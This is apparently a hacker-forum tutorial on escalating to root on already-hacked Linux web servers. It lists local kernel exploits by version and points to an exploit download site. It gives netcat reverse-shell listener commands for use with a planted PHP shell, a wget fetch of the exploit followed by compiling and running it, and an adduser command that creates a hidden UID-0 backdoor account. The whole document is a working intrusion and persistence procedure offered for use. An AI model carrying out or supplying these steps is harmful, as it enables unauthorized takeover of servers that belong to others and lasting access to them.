Rooting Tutorial and Adding New Root User

Hello all and welcome to a tutorial on how to root a linux server.
This is going to be short,HQ tutorial with pictures included (For better learining)

So let's start with things you will need:

1) Shelled website
2) Local root exploit
3) NetCat

Chapter 1 - Gathering informations

Open up your .php shell on a hacked webserver.
I have mine for an example

Now you need to check what kernel your slave is using...
It should be something like

Code:

Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

Next thing you wanna do is to look for an local root exploit.
From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.

Here's the list of exploits

Code:

2.2 ->  ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

Now when you confirmed your exploit it's time to find it...
Google is your best friend and this site here...
http://localroot.th3-0utl4ws.com/ It does have many exploits.

NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.

Chapter 2 - Backconnecting to the server

For this you will need:

1) NetCat
2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)

So open your netcat and type:

Code:

-l -n -v -p 443

Hit "Enter"

Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".



Now it should connect to your netcat
I got something like this:

Chapter 3 - Downloading exploit and executing it

Now we will need our exploit from Chapter 1
There's 2 way of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:

Code:

wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip

Now it downloaded out exploit named "2.6.18-164.zip" on our server.

If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:

Code:

gcc anyrandomname.c -o anyrandomname

And our exploit is compiled. (If you get errors when compiling then find another exploit)



If you downloaded your exploit in zip file anyrandomname.zip type:

Code:

unzip anyrandomname.zip

Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.

Type:

Code:

chmod 777 yourexploit'sname

With common sense where i typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit

Code:

./yourexploit'sname

To check if you got root type

Code:

id

or

Code:

whoami

Mine steps to root

Chapter 4 - Adding root user

Adding new root user is fairly easy
We use this command:

Code:

adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:

Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account.

NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type in next:

Code:

passwd Root2

(Root2 is your username)

See an example

Code:

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

Code:

id root2

(Root2 is your username)

All programs/sites i used:

GNY shell - http://privatepaste.com/1321f97984
Google - http://google.com
NetCat - http://downloadnetcat.com/nc11nt.zip

So that concluded our rooting tutorial.
I hope that someone will learn from this and that this thread will be bookmarked for generations